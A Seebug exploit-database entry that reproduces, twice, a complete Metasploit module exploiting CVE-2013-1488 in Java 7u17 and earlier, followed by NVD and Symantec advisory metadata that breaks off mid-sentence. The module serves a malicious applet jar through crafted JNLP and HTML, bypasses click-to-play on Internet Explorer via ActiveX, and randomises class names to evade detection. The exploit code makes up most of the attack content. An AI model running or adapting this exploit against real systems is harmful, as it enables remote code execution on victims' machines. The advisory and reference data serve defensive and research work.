ID SSV:79781 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
'Description' => %q{
This module abuses the java.sql.DriverManager class where the toString() method
is called over user supplied classes, from a doPrivileged block. The vulnerability
affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE
throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java
Web Start can be launched automatically throw the ActiveX control. Otherwise the
applet is launched without click-to-play bypass.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability discovery and Analysis
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1488' ],
[ 'OSVDB', '91472' ],
[ 'BID', '58504' ],
[ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")
@driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")
@driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
@object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
@driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
@jnlp_name = rand_text_alpha(8)
super
end
def jnlp_file
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
<description>#{rand_text_alpha(8)}</description>
<offline-allowed/>
</information>
<resources>
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
</resources>
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
<param name="__applet_ssv_validated" value="true"></param>
</applet-desc>
<update check="background"/>
</jnlp>
|
return jnlp
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jnlp$/i
send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("FakeDriver.class", @driver_class)
jar.add_file("FakeDriver2.class", @driver2_class)
jar.add_file("META-INF/services/java.lang.Object", @object_services)
jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
</body>
</html>
|
return html
end
end
{"lastseen": "2017-11-19T16:03:04", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2017-11-19T16:03:04"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1488"]}, {"type": "symantec", "idList": ["SMNTC-58504"]}, {"type": "saint", "idList": ["SAINT:AEAAB8FB1BD480E4A2D604850A3646A6", "SAINT:420F87A117CB5F2241DF187A7990D7CF", "SAINT:116AF8634B5A70832986245A74722785"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_DRIVER_MANAGER"]}, {"type": "threatpost", "idList": ["THREATPOST:92F8A3F31577F6D3E7142B4AEA6BB5FE", "THREATPOST:247A5639B207C2C522F735B0C3412087"]}, {"type": "zdi", "idList": ["ZDI-13-076"]}, {"type": "exploitdb", "idList": ["EDB-ID:26135"]}, {"type": "zdt", "idList": ["1337DAY-ID-20868"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121956"]}, {"type": "nessus", "idList": ["MACOSX_JAVA_10_6_UPDATE13.NASL", "CENTOS_RHSA-2013-0770.NASL", "UBUNTU_USN-1819-1.NASL", "SUSE_11_JAVA-1_6_0-OPENJDK-130512.NASL", "SL_20130424_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2013-0770.NASL", "OPENSUSE-2013-410.NASL", "OPENSUSE-2013-426.NASL", "ALA_ALAS-2013-185.NASL", "REDHAT-RHSA-2013-0770.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:881724", "OPENVAS:1361412562310123635", "OPENVAS:1361412562310841421", "OPENVAS:1361412562310881724", "OPENVAS:881719", "OPENVAS:1361412562310870988", "OPENVAS:841421", "OPENVAS:1361412562310881719", "OPENVAS:870988", "OPENVAS:1361412562310120271"]}, {"type": "amazon", "idList": ["ALAS-2013-185", "ALAS-2013-183"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0770", "ELSA-2013-0751", "ELSA-2013-0752"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0814-1"]}, {"type": "redhat", "idList": ["RHSA-2013:0770", "RHSA-2013:0751", "RHSA-2013:0752", "RHSA-2013:0822", "RHSA-2013:0757"]}, {"type": "centos", "idList": ["CESA-2013:0770", "CESA-2013:0751", "CESA-2013:0752"]}, {"type": "ubuntu", "idList": ["USN-1819-1", "USN-1806-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13016"]}, {"type": "gentoo", "idList": ["GLSA-201401-30", "GLSA-201406-32"]}], "modified": "2017-11-19T16:03:04"}, "vulnersScore": 8.7}, "href": "https://www.seebug.org/vuldb/ssvid-79781", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:79781", "title": "Java Applet Driver Manager Privileged toString() Remote Code Execution", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": ["CVE-2013-1488"], "viewCount": 3, "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({ :javascript => false })\r\n\r\n def initialize( info = {} )\r\n\r\n super( update_info( info,\r\n 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',\r\n 'Description' => %q{\r\n This module abuses the java.sql.DriverManager class where the toString() method\r\n is called over user supplied classes, from a doPrivileged block. The vulnerability\r\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE\r\n throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java\r\n Web Start can be launched automatically throw the ActiveX control. Otherwise the\r\n applet is launched without click-to-play bypass.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # Vulnerability discovery and Analysis\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1488' ],\r\n [ 'OSVDB', '91472' ],\r\n [ 'BID', '58504' ],\r\n [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],\r\n [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]\r\n ],\r\n 'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Platform' => ['java'],\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows x86 (Native Payload)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Linux x86 (Native Payload)',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 10 2013'\r\n ))\r\n end\r\n\r\n\r\n def setup\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")\r\n @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")\r\n @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")\r\n @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")\r\n @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")\r\n @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n\r\n @exploit_class_name = rand_text_alpha("Exploit".length)\r\n @exploit_class.gsub!("Exploit", @exploit_class_name)\r\n\r\n @jnlp_name = rand_text_alpha(8)\r\n\r\n super\r\n end\r\n\r\n def jnlp_file\r\n jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"\r\n\r\n jnlp = %Q|\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">\r\n <information>\r\n <title>Applet Test JNLP</title>\r\n <vendor>#{rand_text_alpha(8)}</vendor>\r\n <description>#{rand_text_alpha(8)}</description>\r\n <offline-allowed/>\r\n </information>\r\n\r\n <resources>\r\n <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />\r\n <jar href="#{rand_text_alpha(8)}.jar" main="true" />\r\n </resources>\r\n <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">\r\n <param name="__applet_ssv_validated" value="true"></param>\r\n </applet-desc>\r\n <update check="background"/>\r\n</jnlp>\r\n |\r\n return jnlp\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status("handling request for #{request.uri}")\r\n\r\n case request.uri\r\n when /\\.jnlp$/i\r\n send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })\r\n when /\\.jar$/i\r\n jar = payload.encoded_jar\r\n jar.add_file("#{@exploit_class_name}.class", @exploit_class)\r\n jar.add_file("FakeDriver.class", @driver_class)\r\n jar.add_file("FakeDriver2.class", @driver2_class)\r\n jar.add_file("META-INF/services/java.lang.Object", @object_services)\r\n jar.add_file("META-INF/services/java.sql.Driver", @driver_services)\r\n metasploit_str = rand_text_alpha("metasploit".length)\r\n payload_str = rand_text_alpha("payload".length)\r\n jar.entries.each { |entry|\r\n entry.name.gsub!("metasploit", metasploit_str)\r\n entry.name.gsub!("Payload", payload_str)\r\n entry.data = entry.data.gsub("metasploit", metasploit_str)\r\n entry.data = entry.data.gsub("Payload", payload_str)\r\n }\r\n jar.build_manifest\r\n\r\n send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })\r\n when /\\/$/\r\n payload = regenerate_payload(cli)\r\n if not payload\r\n print_error("Failed to generate the payload.")\r\n send_not_found(cli)\r\n return\r\n end\r\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n else\r\n send_redirect(cli, get_resource() + '/', '')\r\n end\r\n\r\n end\r\n\r\n def generate_html\r\n jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"\r\n\r\n # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass\r\n # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass\r\n html = %Q|\r\n <html>\r\n <body>\r\n <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>\r\n <param name="app" value="#{jnlp_uri}">\r\n <param name="back" value="true">\r\n <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n return html\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79781", "type": "seebug", "objectVersion": "1.4"}
{"cve": [{"lastseen": "2019-05-29T18:13:01", "bulletinFamily": "NVD", "description": "The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to execute arbitrary code via unspecified vectors involving reflection, Libraries, \"improper toString calls,\" and the JDBC driver manager, as demonstrated by James Forshaw during a Pwn2Own competition at CanSecWest 2013.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-1488", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1488", "published": "2013-03-08T18:55:00", "title": "CVE-2013-1488", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-13T14:30:48", "bulletinFamily": "software", "description": "### Description\n\nOracle Java SE is prone to a remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the current process.\n\n### Technologies Affected\n\n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Communication Manager Utility Services 6.3 \n * Avaya Aura Conferencing 6.0 SP1 Standard \n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 1.1 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Aura System Platform 6.2.2 \n * Avaya Aura System Platform 6.3 \n * Avaya Meeting Exchange 6.0 \n * Avaya Meeting Exchange 6.2 \n * Avaya one-X Client Enablement Service 6.0 SP1 \n * Avaya one-X Client Enablement Service 6.0 SP2 \n * Avaya one-X Client Enablement Service 6.0 SP3 \n * Avaya one-X Client Enablement Service 6.1 \n * Avaya one-X Client Enablement Service 6.1 SP1 \n * Avaya one-X Client Enablement Service 6.1 SP2 \n * Avaya one-X Client Enablement Services 6.0 \n * Avaya one-X Client Enablement Services 6.1 \n * Avaya one-X Client Enablement Services 6.1.1 \n * Avaya one-X Client Enablement Services 6.1.2 \n * Avaya one-X Client Enablement Services 6.2 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Fedoraproject Fedora 19 \n * Gentoo Linux \n * IBM Intelligent Operations Center 1.5 \n * IBM Intelligent Operations Center 1.5.0.1 \n * IBM Intelligent Operations Center 1.5.0.2 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Java SE 6 \n * IBM Java SE 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.0.2.1 \n * IBM Lotus Domino 8.0.2.2 \n * IBM Lotus Domino 8.0.2.3 \n * IBM Lotus Domino 8.0.2.4 \n * IBM Lotus Domino 8.5.0 \n * IBM Lotus Domino 8.5.0.1 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.1.1 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Domino 8.5.4 \n * IBM Lotus Domino 9.0 \n * IBM Lotus Notes 8.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.0.2.1 \n * IBM Lotus Notes 8.0.2.2 \n * IBM Lotus Notes 8.0.2.3 \n * IBM Lotus Notes 8.0.2.4 \n * IBM Lotus Notes 8.0.2.5 \n * IBM Lotus Notes 8.0.2.6 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.0.1 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.1.2 \n * IBM Lotus Notes 8.5.1.3 \n * IBM Lotus Notes 8.5.1.4 \n * IBM Lotus Notes 8.5.1.5 \n * IBM Lotus Notes 8.5.2 \n * IBM Lotus Notes 8.5.2.1 \n * IBM Lotus Notes 8.5.2.2 \n * IBM Lotus Notes 8.5.2.3 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 9.0 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 6.2.1 \n * IBM Maximo Asset Management 6.2.2 \n * IBM Maximo Asset Management 6.2.3 \n * IBM Maximo Asset Management 6.2.4 \n * IBM Maximo Asset Management 6.2.5 \n * IBM Maximo Asset Management 6.2.6 \n * IBM Maximo Asset Management 6.2.7 \n * IBM Maximo Asset Management 6.2.8 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.1.1 \n * IBM Maximo Asset Management 7.1.2 \n * IBM Maximo Asset Management 7.2 \n * IBM Maximo Asset Management 7.2.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 6.2 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Operational Decision Manager 8.0 \n * IBM Operational Decision Manager 8.5 \n * IBM Rational Host On-Demand 11.0.0 \n * IBM Rational Host On-Demand 11.0.7 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.3.0 \n * IBM Tivoli Endpoint Manager for Remote Control 8.2.1 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli Monitoring 6.2.0 \n * IBM Tivoli Monitoring 6.2.1 \n * IBM Tivoli Monitoring 6.2.2 \n * IBM Tivoli Monitoring 6.2.3 \n * IBM Tivoli Monitoring 6.3.0 \n * IBM Tivoli Remote Control 5.1.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.2 \n * IBM Tivoli System Automation Application Manager 3.1 \n * IBM Tivoli System Automation Application Manager 3.2 \n * IBM Tivoli System Automation Application Manager 3.2.1 \n * IBM Tivoli System Automation Application Manager 3.2.2 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * IBM Virtualization Engine TS7700 \n * IBM WebSphere ILOG JRules 7.1 \n * IBM WebSphere Operational Decision Management 7.5.0.0 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_17 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_13 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_17 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_13 \n * Oracle JDK(Linux Production Release) 1.7.0_14 \n * Oracle JDK(Linux Production Release) 1.7.0_15 \n * Oracle JDK(Linux Production Release) 1.7.0_17 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_14 \n * Oracle JDK(Solaris Production Release) 1.7.0_15 \n * Oracle JDK(Solaris Production Release) 1.7.0_17 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_14 \n * Oracle JDK(Windows Production Release) 1.7.0_15 \n * Oracle JDK(Windows Production Release) 1.7.0_17 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_17 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.7.0_17 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE (Windows Production Release) 1.7.0_17 \n * Oracle JRE (Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_13 \n * Oracle JRE(Linux Production Release) 1.7.0_14 \n * Oracle JRE(Linux Production Release) 1.7.0_15 \n * Oracle JRE(Linux Production Release) 1.7.0_17 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_12 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_14 \n * Oracle JRE(Solaris Production Release) 1.7.0_15 \n * Oracle JRE(Solaris Production Release) 1.7.0_17 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_14 \n * Oracle JRE(Windows Production Release) 1.7.0_15 \n * Oracle JRE(Windows Production Release) 1.7.0_17 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 11 SP2 \n * SuSE openSUSE 12.2 \n * Ubuntu Ubuntu Linux 10.04 LTS \n * Ubuntu Ubuntu Linux 11.10 \n * Ubuntu Ubuntu Linux 12.04 LTS \n * Ubuntu Ubuntu Linux 12.10 amd64 \n * Ubuntu Ubuntu Linux 12.10 i386 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users 